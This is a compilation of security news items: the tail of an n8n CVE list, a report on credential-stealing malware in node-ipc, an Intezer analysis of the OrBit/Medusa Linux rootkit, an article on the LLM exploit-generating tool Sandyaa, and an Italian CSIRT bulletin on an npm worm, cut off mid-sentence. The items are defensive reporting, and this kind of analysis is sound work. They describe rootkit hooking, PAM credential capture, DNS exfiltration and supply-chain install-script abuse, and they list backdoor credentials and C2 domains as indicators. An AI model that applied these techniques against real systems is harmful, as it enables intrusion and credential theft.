webhook handler that allows prototype pollution via a crafted XML payload, enabling an authenticated user with permission to create or modify workflows to achieve remote code execution on the n8n host. (Fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1) CVE-2026-42232 (CVSS score: 9.4) - An authenticated user with permission to create or modify workflows could achieve global prototype pollution via the XML Node, leading to remote code execution when combined with other nodes exploiting the prototype pollution. (Fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1) CVE-2026-44791 (CVSS score: 9.4) - A bypass for CVE-2026-42232 that could result in remote code execution on the n8n host. (Fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1) CVE-2026-44789 (CVSS score: 9.4) - An authenticated user with permission to create or modify workflows could achieve global prototype pollution via an unvalidated pagination parameter in the HTTP Request node, leading to remote code execution on the n8n host. (Fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1) CVE-2026-44790 (CVSS score: 9.4) - An authenticated user with permission to create or modify workflows could inject CLI flags on the Git node's Push operation, enabling an attacker to read arbitrary files from the n8n server and resulting in full compromise. (Fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1) Software Patches from Other Vendors Security updates have also been released by other vendors over the past several weeks to rectify various vulnerabilities, including - ABB Adobe Amazon Web Services AMD Apple ASUS Atlassian Axis Communications AVEVA Canon Cisco CODESYS ConnectWise Dell Devolutions Drupal F5 Fortra Foxit Software Fujitsu GitLab GnuTLS Google Android and Pixel Google Chrome Google Cloud Grafana Hikvision Hitachi Energy Honeywell HP HP Enterprise (including Aruba Networking and Juniper Networks) Huawei IBM Intel Jenkins Lenovo Linux distributions AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu MediaTek Meta WhatsApp Microsoft Mitel Mitsubishi Electric MongoDB Moxa Mozilla Firefox, Firefox ESR, and Thunderbird NVIDIA OPPO Palo Alto Networks Phoenix Contact Phoenix Technologies Progress Software QNAP Qualcomm React Ricoh Samsung Schneider Electric Siemens Sophos Spring Framework Supermicro Synology Tenable TP-Link WatchGuard Zoom, and Zyxel
thehackernews.comMay 18, 2026extracted
Popular node-ipc npm package compromised to steal credentials
Hackers have injected credential-stealing malware into newly published versions of node-ipc, a popular inter-process communication package, in a new supply chain attack targeting npm. The node-ipc package is a Node.js module that enables various processes to communicate through all forms of sockets, including Unix, Windows, UDP, TLS, and TCP. Despite the maintainer publishing in March 2022 weaponized versions that targeted Russia and Belarus-based systems with a data-overwriting module, in protest to the Russian invasion of Ukraine, the package still has more than 690,000 weekly downloads on npm. The recent supply-chain attack was detected by multiple application security companies, including Socket, Ox Security, and Upwind, who confirmed the following three versions as malicious: [email protected] [email protected] [email protected] The malicious code hides inside the CommonJS entrypoint (node-ipc.cjs) and executes automatically whenever applications are loaded. The malware is heavily obfuscated and fingerprints infected systems, collects environment variables and sensitive local files, compresses the stolen data into archives, and exfiltrates it through DNS TXT queries. The latest compromise appears to be the work of an external actor who compromised the account of an inactive maintainer named 'atiertant.' According to the researchers, the infostealer injected in the new node-ipc versions collects the following types of information from compromised systems: Cloud credentials from AWS, Azure, GCP, OCI, DigitalOcean, and others SSH keys and SSH configs Kubernetes, Docker, Helm, and Terraform credentials npm, GitHub, GitLab, and Git CLI tokens .env files and database credentials Shell histories and CI/CD secrets macOS Keychain files and Linux keyrings Firefox profile and key database files (on macOS) Microsoft Teams local storage and IndexedDB paths The malware skips files larger than 4 MiB and avoids scanning .git and node_modules directories to increase efficiency and reduce operational noise on the host. A notable operational characteristic is the use of DNS TXT queries instead of conventional HTTP-based command-and-control (C2) traffic for data exfiltration. The attackers use a fake Azure-themed domain (sh[.]azurestaticprovider[.]net:443) as a bootstrap resolver, transmitting the data to ‘bt[.]node[.]js’ with query prefixes like xh, xd, and xf. According to Socket, exfiltrating a 500 KB compressed archive could generate roughly 29,400 DNS TXT requests, helping the traffic blend into normal DNS activity. Prior to submission, the malware stores collected data in temporary compressed tar.gz archives, which are deleted after exfiltration to reduce forensic traces. The malware does not establish persistence or download any secondary payloads, so the operation appears focused on rapid credential theft and exfiltration. Potentially impacted developers should immediately remove the affected versions, rotate exposed secrets and credentials, and inspect lockfiles and npm caches. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMay 15, 2026extracted
OrBit (Re)turns: Tracking an open-source Linux rootkit across four years of forks and deployments
OrBit (Re)turns: Tracking an open-source Linux rootkit across four years of forks and deployments May 14, 2026 Written by Nicole Fishbein In July 2022, we published the first analysis of OrBit, a then-undocumented Linux userland-rootkit that stood out for its comprehensive libc hooking, SSH backdoor access, and PAM-based credential harvesting. At the time, OrBit appeared as a single sample with a single operator fingerprint, and the codebase itself looked customized. It wasn't. As we will show below, OrBit is a repackaged and selectively weaponized build of Medusa, an open-source LD_PRELOAD rootkit published on GitHub in December 2022. The story of OrBit's four-year evolution is not one of novel development; it's the story of how a publicly available rootkit was forked, configured, and redeployed. Nearly four years later, OrBit is still in the wild, and it has not stood still. Hunting across VirusTotal, we pulled more than a dozen samples spanning 2022 through 2026 and walked each one through static and differential analysis. We discovered two parallel lineages: a full-featured "Lineage A" build that tracks closely with the 2022 original, and a lite "Lineage B" fork that drops entire capability domains (PAM, pcap, TCP-port hiding) in exchange for a smaller footprint. Along the way, the operators rotate XOR keys, shuffle install paths, swap backdoor credentials, add auditd-evasion hooks, and eventually bolt on a service-side PAM impersonation primitive. This blog picks up where the 2022 analysis left off. We focus on what changed, when, and why it matters for defenders. For each epoch, we enumerate the samples, call out the lineage, and break down the meaningful changes: credential changes, hook-set diffs, new evasion behavior, and operator tradecraft. Background: What is OrBit? For readers unfamiliar with the original analysis, OrBit is a Linux userland-rootkit deployed as a shared library (.so) that achieves persistence by patching the dynamic linker, specifically modifying ld.so to ensure the malicious library is loaded into every process on the system. It operates as a passive implant with no command-and-control communication; instead, the attacker connects in through an SSH backdoor. Once installed, OrBit hooks into PAM functions to harvest credentials from SSH and sudo authentication attempts, storing the captured passwords locally. Its evasion capabilities are comprehensive, hooking over forty libc functions to hide files, processes, and network connections from administrators and security tools alike. The malware stores its harvested credentials and configuration data in /lib/libntpVnQE6mk/, a directory that remains invisible to standard enumeration thanks to the rootkit's own hooks. July 2022 We will refer to this variant as Lineage A "Full" build of OrBit. OrBit variants through the years In our research, we collected samples from VirusTotal. Unlike PE files, ELF files don’t include a compilation timestamp, so we started by aggregating the samples by the date they were submitted to VirusTotal. To track the samples on the blog, we use the first 8 characters of each sample's SHA-256. At the bottom of the blog, you can find the full list of IOCs. December 2022 The first version shows a slight change: the username and password for the SSH connection, and the exported functions. Credential mechanism shift: 40b5127c resolved the backdoor username dynamically via the getpwuid hook; ec7462c3 dropped that hook entirely and hardcodes adm1n directly in the XOR-encrypted string table. The working folder was changed to libseconf. For the most part, the later variants will use this path. All other capabilities are identical: file I/O interception, stat hiding, PAM credential capture, TCP port hiding (alloc_tcp_ports/remove_port/tcp_port_hidden), load monitoring (.showload/.maxload), pcap sniffing, LD_PRELOAD management, log suppression, and process hiding. The transition from 2022 to 2023 is essentially a redeployment with new credentials and a more convincing install path, plus a minor simplification (dropping dynamic UID lookup in favor of a hardcoded username). The rootkit's hook surface stayed stable. Samples From 2023 The d419a9b1 sample stands out for the operator's choice of the install path (/lib/fuckwhitehatshome/) and the SSH username and password. No other known samples use these strings, suggesting a different operator or persona authored this particular build rather than it simply being a different deployment of the same toolkit. Functionally, it carries the full 2022-era hook set, with 65 exports. The 296d28eb sample is a full-featured build that uses the libseconf path and the same SSH credentials as ec7462c3. But this sample also has an evolutionary step: dropped TCP port hiding, added the exported xread function. This is not an LD_PRELOAD hook on a system library; it's a wrapper that calls syscall(SYS_read) directly, bypassing the rootkit's own hooked read(). The rootkit hooks the libc read() function; the hook filters out rootkit artifacts from files such as/proc/net/tcp and directory listings. Some C programs, such as Git, define their own internal xread() helper that wraps read() to handle partial reads and EINTR. Normally, these internal helpers call libc read(), which the rootkit intercepts and filters. By exporting its own xread, which directly calls syscall (SYS_read), the rootkit shadows these program-internal helpers with a version that bypasses its own read hook entirely. This is a compatibility fix: without it, any program that defines xread would receive the rootkit's filtered output through its core I/O path, potentially corrupting SSH protocol streams, breaking git operations, or causing other malfunctions that could expose the rootkit's presence. The hook ensures that programs continue to function normally while the rootkit's read interception remains active for standard libc callers. Both files, 3ba6c174 and 4203271c, represent the first appearance of Lineage B, a deliberately lite fork of the OrBit rootkit. Both are dynamically linked shared objects using the standard 0xA2 XOR key and installed in /lib/libseconf/, but they export only 54 functions, compared to the 67 in their closest Lineage A contemporaries (d419a9b1, ec7462c3). The 13 removed exports strip out three entire capability domains: network port-hiding (alloc_tcp_ports, remove_port, tcp_port_hidden, clean_ports), PAM credential interception (pam_authenticate, pam_acct_mgmt, pam_open_session, pam_get_password), and packet capture (pcap_loop, pcap_packet_callback). The string table reflects this (.logpam and .udp are absent), though .ports, .hosts, and sshpass2.txt are retained. This reduced feature set suggests they were purpose-built for different target environments where a smaller footprint or more limited functionality was either sufficient or preferred. The most notable change is the complete absence of a backdoor password. Every Lineage A sample embeds a password in its XOR-encrypted string block, but in both 3ba6c174 and 4203271c, the password field is missing. Each sample carries a distinct username (adm1n and b4ph0m3t0, respectively), and these are the only byte-level differences between the two binaries. This pattern of 54 exports, no password, no PAM/pcap hooks, held consistent across all subsequent Lineage B samples through 2024. Samples From 2024 2024 is the most diverse epoch in OrBit's timeline, with both lineages active simultaneously and an encryption key change in the Lineage A branch. eea274ed / a6138638: Lineage A, 0xAA key rotation These two samples belong to the same lineage: identical XOR key (0xAA is a break from the long-standing 0xA2), identical credentials (Y0u4reCu6e / 1qaz@WSX3edc123), and identical hook count (54). The only structural difference is the install path: /lib64/libseconf/ versus /lib/locate/. This is probably a deliberate path rotation to evade detections anchored on the previously documented /lib/libseconf/ directory. Credentials are stored inline in the XOR-encrypted block rather than written to sshpass.txt, representing a shift in the credential storage model. Both samples also have a reduced hook for the' execve' function: the execve hook handles persistence maintenance (apt/yum), output sanitization (dmesg), and ldd defeat. Compared to other samples in the lineage, it is a reduced feature set: no strace interception, no IP/iptables hooks, no command logging. Despite sharing the same hook count, the two samples do not share the same hook set. a6138638 swaps read/write for readdir_r/readdir64_r, indicating a targeted adjustment to the directory-hiding mechanism. A string-level diff reveals more changes: Credential harvesting is saved in remote.txt. This variant captures only SSH logins, not sudo sessions ([sudo] pass is missing). The result is 52 decoded XOR strings in eea274ed versus 47 in a6138638. Both samples retain .udp, .pts, and the credential pair, preserving the core backdoor functionality. The removals target logging and forensic-capture features, suggesting a6138638 was tailored for a deployment where a lighter footprint was preferred. a34299a1 / b1dd18a6 / 989f7eb4: Lineage B continuation These samples continue the 54-export lite build lineage that first appeared in 2023 with 3ba6c174/4203271c. The hook set is identical (49 hooks), the XOR key remains 0xA2, and the same capability domains are absent: no PAM credential interception, no pcap sniffing, no TCP port hiding. The password field is still missing from the binary. Each sample carries a distinct username (rebel, Gestuff, adm1n, respectively), consistent with the Lineage B pattern of per-deployment username rotation, with no corresponding password. 989f7eb4 is the payload extracted from the 48a68d05 dropper. It was not on VT; we uploaded it. Samples From 2025 The 2025 epoch marks two significant capability additions to Lineage A and confirms the rootkit's return to the 0xA2 encryption key after the 2024 0xAA experiment. Two distinct rootkit .so builds are present in 2025, both Lineage A: 8e83cbb2 represents the most capable build to date. Its 66-export set includes a significant new hook not seen in any prior variant: pam_sm_authenticate. This is the PAM service-side authentication function, meaning the rootkit now hooks both sides of the PAM stack. Where earlier variants could only passively capture credentials via client-side pam_authenticate, this build can also forge authentication outcomes, allowing the attacker to approve or deny login attempts at will. The export set also includes xread, first seen in 296d28eb (2023). 2b2eeb22 is a second Lineage A payload with 64 exports. XOR 0xA2 decode confirms credentials adm1n/asdfasdf, the same operator behind ec7462c3 (2022), 296d28eb (2023), and the 26082cd3 inner payload (2024), now spanning four years. 84828f31 is a truncated copy of 2b2eeb22 (same BuildID: cbc9724027399723a27daa4114ffcdf906cb802f, identical bytes up to 107KB, missing the trailing 102KB containing section headers and symbol tables), it is likely an incomplete extraction or download artifact. It is not a distinct sample. XOR 0xA2 string decode of both payloads confirms the full Lineage A string set is restored: sshpass.txt and sshpass2.txt both present, plus .logpam, .udp, .ports (×2), /proc/net/tcp. The string removals introduced by the 2024 0xAA cluster (a6138638's missing local.txt, sniff.txt, etc.) were not carried forward, and both builds return to the comprehensive logging and credential-capture model. Dropper Samples 090b15fd, 64a3ebd3, and b85ed157 are statically linked ELF executables that carry 8e83cbb2 as an embedded .so and share the same Build ID: da256c78910c552eb334814ada85c7655b717c4f. d3d204c1 is the same type of dropper carrying 2b2eeb22. All four share the same architecture first seen in f1612924 (from 2022). 73b95b7d: A New Dropper Architecture 73b95b7d is not just a dropper, it is an infector that carries the dropper as an embedded payload. This creates a two-stage delivery chain: infector → dropper → rootkit. The inner binary (090b15fd, embedded at file offset 0x20d7) is the dropper we previously saw. The infector's role is propagation and persistence; the dropper's role is to extract and install the rootkit .so via ld.so.preload. The infector scans the filesystem for ELF binaries and injects the second-stage payload into them. An infection marker bongripz4jezuz (stored in base64 encoding as: Ym9uZ3JpcHo0amV6dXoK) is checked before each infection attempt to avoid re-infecting the same target. The injected binaries include: /bin/ls All 64-bit ELF files in the current working directory that have read/write access. Additionally, /etc/cron.hourly/0 is created as a persistence mechanism (to download and execute a remote payload), though it is a shell script rather than an ELF injection target. This is the first OrBit component with any form of C2 communication. Every previous version was a purely passive implant, meaning the attacker connected via the SSH backdoor. This introduces an external command channel that can deliver updated payloads or instructions, adding a reinfection mechanism on top of ld.so.preload persistence. The earlier droppers stored all paths and commands as plaintext. 73b95b7d is the first dropper to implement string protection: a custom substitution cipher using two lookup tables at .data offsets for the cipher and plain, each with 88 entries, defining a character-by-character mapping. Notably, this is a different scheme from the XOR encryption used by the previous rootkit payloads. The structure of this dropper, which delivers the OrBit payload in the final stage, is identical to that described in this APNIC blog that analyzed a dropper that delivered RHOMBUS malware. Rhombus is a Linux-based botnet malware first reported in February 2020 by the MalwareMustDie research group, which analyzed and shared samples of it. It acts as an installer/dropper that persists on infected devices, drops a second-stage payload, and then uses the compromised system for DDoS activity. The target systems are VPS and IoT devices. (SHA256 of the dropper: b982276458a85cd3dd7c8aa6cb4bbb2d4885b385053f92395a99abbfb0e43784). Interestingly, the dropper 73b95b7d that delivers the OrBit payload in the final stage is identical to the one used in the Rhombus campaign 6 years ago. Coincidentally, both droppers use the same domain to download the payload as part of the cron-job-based persistence. The current resolution of the domain is to 109.95.212[.]253. The host has a unique BANNER_0_HASH-IP value, ba0c31785465186600a76b7af2a37aa6, that is shared with only one other IP, 109.95.211[.]141, as shown in the screenshot below from Validin. Based on the ASN resolution, both IP addresses are located in Russia. The fact that the OrBit dropper shares the same domain as malware from 6 years ago can also be interpreted as an attempt to mislead researchers; therefore, we are not taking this evidence into account for attribution at this moment. However, it is worth noting that this connection exists. Samples From February 2026 These two samples are confirmed to be identical in structure: the same 54-hook set, the same XOR key (0xA2), and the same working directory (/lib/libseconf/). The only difference is credentials: jokerteam/HACK89SERVER versus 57ill4Cu63/1qaz@WSX3edc098. XOR 0xA2 decode confirms the full Lineage A string set. No Lineage B samples have surfaced since 2024, suggesting the lite build may have been retired or consolidated back into the main branch. Connection to BLOCKADE SPIDER In CrowdStrike’s 2026 Global Threat Report, they mention that BLOCKADE SPIDER used the OrBit backdoor to maintain persistence and stealthy access to virtualization environments. BLOCKADE SPIDER is a CrowdStrike-tracked eCrime adversary that has been active at least since 2024. They are known for running Embargo ransomware campaigns using sophisticated, multi-domain attack techniques. Origin: OrBit is a fork of the Medusa open-source rootkit Mandiant's reporting on UNC3886 espionage operations identifies MEDUSA and its installer, SEAELF, as tools used by this state-sponsored actor against Juniper and VMware infrastructure. Essentially, OrBit is built from Medusa, an open-source LD_PRELOAD rootkit published on GitHub (github.com/ldpreload/Medusa) in December 2022. Mandiant's MEDUSA configuration table matches our 2024 Lineage A 0xAA-key cluster exactly across four independent fields: the XOR key 0xAA, the backdoor credentials Y0u4reCu6e and 1qaz@WSX3edc123, the install path /lib/locate/, and a modification to the rootkit that redirects strace output to /tmp/orbit.txt. That literal orbit filename, preserved as a plaintext artifact inside UNC3886's MEDUSA binary, is direct cross-attribution: Mandiant's "MEDUSA" sample set and our "OrBit" 2024 cluster are the same builds. We compiled Medusa from source and compared the resulting binaries byte-for-byte against our OrBit corpus. The match is unambiguous, and it rewrites the attribution and evolution story. Evidence of the fork The first is a function-set and export match. Compiling Medusa's src/rkld.c against the default Makefile recipe produces a shared object whose function set, hook list, and XOR-obfuscated string table are a direct superset match for OrBit Lineage A samples. The 2022 OrBit baseline (ec7462c3) shares all core exports with the Medusa build and reuses the identical XOR 0xA2 string obfuscation scheme driven by Medusa's build-time xor_dump() pipeline, with the XOR key itself hardcoded in config.c. The second is a source-filename fingerprint that is present in almost every sample we analyzed. Some of the samples ship with an unstripped ELF .symtab. The resulting filenames are preserved verbatim: rootkit samples carry rkld.c and, when Lineage A is linked in, rknet.c, while loader samples carry rkload.c. Those are the exact names of Medusa's source files, src/rkld.c, src/rknet.c, and src/rkload.c. The filenames themselves are not secret, since the Medusa repository is public, but their verbatim presence in the compiled binary is a strong attribution anchor: every unstripped sample directly identifies the upstream tree it was built from. Of the samples in our corpus, only three are fully stripped (the 2025 dropper 73b95b7d, and the rootkit binaries a6138638 and b9822764). Three representative samples are shown below: a full Lineage A rootkit (ec7462c3, 2022), a Lineage B lite rootkit (3ba6c174, 2023), and the SEAELF loader (26082cd3, 2024). 1: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c 9: 0000000000000000 0 FILE LOCAL DEFAULT ABS rkload.c 14: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c The Lineage A rootkit carries both rkld.c and rknet.c; the Lineage B rootkit, which omits the advanced hook set, carries only rkld.c; and the loader carries rkload.c. The same pattern holds across the wider corpus. Alongside the filename fingerprint, the loader's entry-point dispatch, its build_root() filesystem layout (.boot.sh, .logpam, sshpass.txt, sshpass2.txt, .ports), and its SELinux setxattr sequence all map one-to-one to the Medusa source. The third is an embedded inner ELF produced by xxd -i. Medusa's Makefile embeds build/rkld.so into the loader using the xxd -i build/rkld.so > build/rkld.h step, which is then included by the loader compiled at Makefile line 33. OrBit's loader binaries follow this pattern: a rkld.so blob embedded as a C byte array within the loader ELF, dropped to disk at runtime. The embedding technique, offset layout, and post-drop execution flow are identical. Per-Module Source Mapping Medusa's source tree maps cleanly onto the OrBit binary set we have tracked: The Medusa default Makefile compiles only src/rkld.c. Every Lineage A capability that appeared to "arrive" in OrBit between 2023 and 2025 was already present as source in Medusa's src/rknet.c on day one of the public release. The operators' work was to modify the Makefile to link rknet.c into their build, not to author those functions. Timeline Anomaly Our analysis shows that an initial OrBit sample (40b5127c) appeared in July 2022, predating the repository's publication by approximately 5 months. Based on this information, there are two options: either the Medusa author published a privately-circulated rootkit source that had already been deployed operationally, or the earliest OrBit sample was built from a pre-publication snapshot of the same tree. Either way, the 2022 OrBit sample and the December 2022 Medusa source tree are the same codebase. The question is only which commit was made public first. Implications The appearance of a single rootkit family across four years does not imply a single operator. OrBit and Medusa have been built and deployed by at least three unrelated actor clusters we can presently distinguish, including the state-sponsored espionage activity attributed to UNC3886, the eCrime ransomware operations run by BLOCKADE SPIDER, and the 2025 cron-dropper campaign previously linked to RHOMBUS infrastructure. Attribution at the family level is therefore not enough, and defenders tracking an OrBit infection should separate the questions of which codebase was used from which operator configured and deployed it. Tracking version-over-version changes in OrBit reads less like an active malware development project and more like a record of build-flag toggles, credential rotations, and install-path swaps against a stable upstream. The capability ceiling is set by the Medusa source tree as it existed in December 2022, and every apparent new feature we observed between 2023 and 2025 was already present in that tree, waiting for an operator to link it in. The xread read-hook bypass we first flagged as a 2023 compatibility shim is a function in src/rknet.c. The auditd evasion pair we called out as a 2024 addition, audit_log_acct_message and audit_log_user_message, sits in the same file. The PAM stack we noted as gradually expanding across versions, including pam_authenticate, pam_acct_mgmt, pam_open_session, and the 2025 service-side impersonation hook pam_sm_authenticate, is all present in the same rknet.c, as is the pcap_loop packet hook that appears in full Lineage A builds. None of these files is linked in by the default Makefile recipe, which compiles only src/rkld.c. Their arrival in individual OrBit samples corresponds to an operator modifying the build to include rknet.c, not to new code being written. Signatures based on invariants of the Medusa build pipeline will also flag builds from operators we have not yet seen. Three such invariants are worth calling out. The string table produced by Medusa's xor_dump() routine, which emits every protected string as a contiguous block of single-byte XOR-obfuscated byte arrays within the compiled binary. Operators change the key value (0xA2 in most builds, 0xAA in the 2024 UNC3886 cluster) and some paths, but the table's shape and the majority of its entries are fixed by the source. A YARA rule that decodes the table with a variable single-byte key and matches on a threshold count of known plaintext strings catches any build, regardless of which key was chosen. The filesystem skeleton that the loader's build_root() writes into its install directory. Operators vary only the parent directory (/lib/libseconf/, /lib/locate/, /lib/libntpVnQE6mk/), so host-based detection can alert on the co-occurrence of that filename set inside any directory, and binary-level signatures can match the embedded filename constants and the setxattr call pattern directly. The nested-ELF structure produced by the xxd - +i build/rkld.so > build/rkld.h step in the Makefile, which bakes a full secondary ELF into the loader's .rodata. Every Medusa loader therefore carries a second ELF magic inside its own image, followed by a length constant, and, if the binary is not stripped, two xxd-generated symbols (rkld_so and rkld_so_len ). The nested-ELF shape on its own is not specific enough to be a detection signature: plenty of legitimate software and unrelated malware use xxd -i or equivalent techniques to embed a payload, and any such binary will match a naive "second ELF at non-zero offset plus length constant" rule. The Medusa-specific part is the pairing of that structural pattern with (a) the symbol names rkld_so and rk +ld_so_len in the loader's symbol table when the binary is not stripped, and (b) the inner ELF itself, matching the rootkit fingerprint described earlier in this section, which gives both a family-level anchor and a structural one. Conclusion The analysis of OrBit variants from 2022 through early 2026 reveals a Linux rootkit whose code later surfaced in an open-source codebase named Medusa. This suggests that the backdoor was created before its public release and has since been selectively forked, configured, and redeployed by multiple operators over four years. We identified two parallel build paths: the comprehensive Lineage A ("Full" build), which links in Medusa's src/rknet.c advanced hook set, and the temporary Lineage B (lite build), which ships only the src/rkld.c core and was retired after 2024. Apparent "milestones" in Lineage A are the xread wrapper (2023), the audit_log_* auditd-evasion hooks (2024), and the 2025 addition of the pam_sm_authenticate hook, which corresponds one-to-one with functions already present in Medusa's published source. The operator work is in the build configuration and deployment, not the C code. Our analysis of the OrBit samples also discovered that at least 3 different operators are using the backdoor. A major operational shift occurred in 2025 with the introduction of a new two-stage infector architecture, marking one operator's transition from a purely passive SSH-backdoor implant to malware with its first direct C2 capability. This infector utilizes a cron job to fetch external payloads from the domain cf0[.]pw. The architecture of this new dropper is identical to one used in the 2020 RHOMBUS botnet campaign, suggesting shared tooling or operator overlap, a link further cemented by the C2 domain resolving to infrastructure located in Russia. In parallel, the same Medusa codebase was weaponized upstream by the state-sponsored espionage actor UNC3886 (tracked by Mandiant). The 2024 0xAA-key cluster we tracked as Lineage A corresponds exactly to UNC3886's MEDUSA configuration, including the backdoor credentials, the install path, and a strace artifact that retains the literal "orbit" string. The rootkit has also been adopted by the CrowdStrike-tracked eCrime adversary BLOCKADE SPIDER since at least 2024, who leverage OrBit for stealthy persistence against VMware vCenter infrastructure to facilitate the deployment of Embargo ransomware. The continued emergence of new Lineage A samples in 2026, accompanied by operator-specific credential rotation, confirms that a single public rootkit codebase is being cloned and configured by multiple unrelated actor groups. IOC Table Nicole Fishbein Nicole is a senior security researcher and malware analyst at Intezer. Prior to this, she was an embedded researcher in the IDF Intelligence Corps.
intezer.comMay 14, 2026extracted
Sandyaa: Open-source autonomous security bug hunter
Sandyaa: Open-source autonomous security bug hunter Source code auditing has traditionally relied on static analyzers that flag long lists of potential issues, leaving engineers to sort bugs from noise. A new open-source project from offensive-security firm SecureLayer7 takes a different route, using LLMs to read a codebase, trace how data moves through it, and produce working exploit code for the vulnerabilities it confirms. Their open-source tool, called Sandyaa, was released under an MIT license. How the auditor operates Sandyaa accepts either a local directory or a Git URL and runs the audit end to end with no interactive prompts. It builds context across files, splits large codebases into chunks sized to code density and token budget, and runs recursive analysis passes that revisit the same code multiple times to refine findings. Each confirmed bug is written to a findings/ folder containing an analysis write-up, a Python proof-of-concept, a setup guide, and an evidence.json file that links every claim back to specific file paths and line numbers. Eight recursive phases drive the analysis: call-chain tracing, data-flow expansion, self-verification, vulnerability chaining, proof-of-concept refinement, contradiction detection, assumption validation, and exploitability proof. A separate attacker-control analyzer drops findings that cannot be reached from untrusted input, reducing noise from theoretical issues. Sandyaa looks for memory-safety bugs including use-after-free, buffer overflow, type confusion, and double-free; logic bugs such as authentication bypass, TOCTOU, and state machine errors; injection vulnerabilities including SQL, command, XSS, SSRF, and path traversal; cryptographic misuse; concurrency races; integer overflow and signedness issues; and unsafe APIs including deserialization, XXE, and prototype pollution. Building trust in the output SecureLayer7 began running Sandyaa against live targets only after tightening the verification stack to the point where reviewing tool output became more productive than reading code from scratch. Sandeep Kamble, CTO at SecureLayer7, told Help Net Security that the team “kept tightening the verification pipeline self-verification, vulnerability chaining, contradiction detection, and an attacker-control filter that drops findings unreachable from untrusted input.” He added that the threshold for adoption was practical: “At some point the false-positive rate really low enough that reviewing Sandyaa output was a better use of researcher time than reading code cold.” Two bugs surfaced by the tool have been publicly disclosed so far, both in the Spring AI project: a SQL injection in MariaDBFilterExpressionConverter and a JSONPath injection in PgVectorStore AbstractFilterExpressionConverter. Safety around exploit execution Sandyaa can run the proof-of-concept code it generates to confirm exploitability, a behavior that raises obvious questions about side effects on unfamiliar codebases. Kamble said execution is gated by default: “PoC execution is opt-in, off by default. The attacker-control filter runs before PoC generation, so we don’t build PoCs for paths that aren’t reachable anyway.” No API key, with Gemini as an option Sandyaa piggybacks on a user’s existing Claude Code session. Once a developer is logged into the Claude Code CLI, Sandyaa reuses that authentication and requires no ANTHROPIC_API_KEY. Some analysis phases can run on Gemini if the gemini CLI is on the user’s PATH, again with no API key required. Setting GEMINI_API_KEY is supported only for resolving model tiers at startup. The architecture relies on what the project calls Recursive Language Models. The model drives a Python REPL that runs regex filters, chunks files, and spawns sub-LLM queries, with results aggregated in code. This design lets the tool process repositories larger than a single context window would allow. Platform support and status The project is actively tested on macOS. Linux should work but has not been validated. Native Windows is not supported because Sandyaa shells out using Unix-only commands and spawns the Claude CLI directly; users on Windows can run it through WSL2. Requirements include Node.js 18 or newer, git, and a logged-in Claude Code installation. Configuration lives in .sandyaa/config.yaml, where users set the target path, chunk size, minimum severity, exploitability threshold, and output options. Sandyaa is available for free on GitHub. Must read: 25 open-source cybersecurity tools that don’t care about your budget GitHub CISO on security strategy and collaborating with the open-source community Subscribe to the Help Net Security ad-free monthly newsletter to stay informed on the essential open-source cybersecurity tools. Subscribe here!
helpnetsecurity.comMay 13, 2026extracted
Supply Chain Attack: rilevata nuova ondata di compromissione pacchetti NPM
Supply Chain Attack: rilevata nuova ondata di compromissione pacchetti NPM Bollettino BL01/260512/CSIRT-ITA Sintesi Rilevata una campagna su larga scala di compromissione della supply chain nell'ecosistema npm, denominata "Mini Shai-Hulud". L'attacco sfrutta un malware di tipo worm per infiltrarsi negli ambienti di sviluppo e nelle pipeline di Continuous Integration/Continuous Deployment (CI/CD). L'obiettivo primario è l'esfiltrazione di credenziali sensibili e la successiva propagazione automatizzata attraverso la pubblicazione di versioni malevole di pacchetti legittimi. Tra i soggetti colpiti figurano framework ad ampia diffusione come TanStack e SDK ufficiali di Mistral AI. Descrizione e potenziali impatti La minaccia si articola attraverso una sequenza di operazioni automatizzate volte a massimizzare la persistenza e la diffusione: Vettore di infezione Il malware viene introdotto come dipendenza (spesso dichiarata come optionalDependency) in pacchetti npm compromessi. In fase di installazione, sfrutta lo script prepare della dipendenza Git per avviare il malware e quindi eseguire codice arbitrario. Meccanismo di propagazione Una volta eseguito in un ambiente dotato di privilegi di pubblicazione (es. GitHub Actions con Trusted Publishing/OIDC), il malware ricerca ed esfiltra i token di autenticazione e i segreti d'ambiente (.env, chiavi AWS/Azure, credenziali Kubernetes). Successivamente tenta di utilizzare tali asset per iniettare codice malevolo in altri progetti gestiti dall'utente o dall'organizzazione, pubblicando nuove versioni infette senza intervento umano. Evasione e persistenza L'impiego di optionalDependencies che puntano a dipendenze Git esterne permette di eludere parzialmente i controlli di integrità basati sui registri ufficiali. L'esecuzione si conclude con un errore fittizio (&& exit 1) che, essendo associato a dipendenze opzionali, non interrompe il processo di build principale agendo in modo silente. Impatto La compromissione della riservatezza dei segreti aziendali accessibili sugli ambienti interessati, il potenziale accesso non autorizzato a infrastrutture cloud e la perdita di integrità del codice sorgente distribuito agli utenti finali. Prodotti e versioni affette Sono stati identificati oltre 160 pacchetti compromessi. Gli scope e i pacchetti di maggior rilievo includono: @tanstack/ (incluse versioni specifiche di react-router, query, start, form) @mistralai/ (SDK ufficiali) @uipath/ @squawk/ @tallyui/ safe-action ts-dna altri pacchetti non preceduti da scope Le versioni malevole sono generalmente caratterizzate da incrementi di patch anomali o release pubblicate in finestre temporali ristrette tra l'11 e il 12 maggio 2026. Si segnalano, a titolo esemplificativo, le versioni 1.169.5 e 1.169.8 di @tanstack/react-router. Azioni di mitigazione Si raccomanda l'adozione immediata delle seguenti misure di sicurezza: Ispezione dei Lockfile: Analizzare i file package-lock.json, yarn.lock o pnpm-lock.yaml alla ricerca di riferimenti a repository Git esterni non autorizzati o versioni dei pacchetti sopra elencati rilasciate nelle ultime 48 ore. Pinning delle Dipendenze: Forzare il downgrade delle librerie coinvolte a versioni note e verificate. Rimuovere i modificatori di versione (^ o ~) per impedire aggiornamenti automatici a release potenzialmente contaminate. Rotazione delle Credenziali: Procedere alla revoca e rigenerazione immediata di tutti i segreti presenti negli ambienti CI/CD, inclusi token npm, 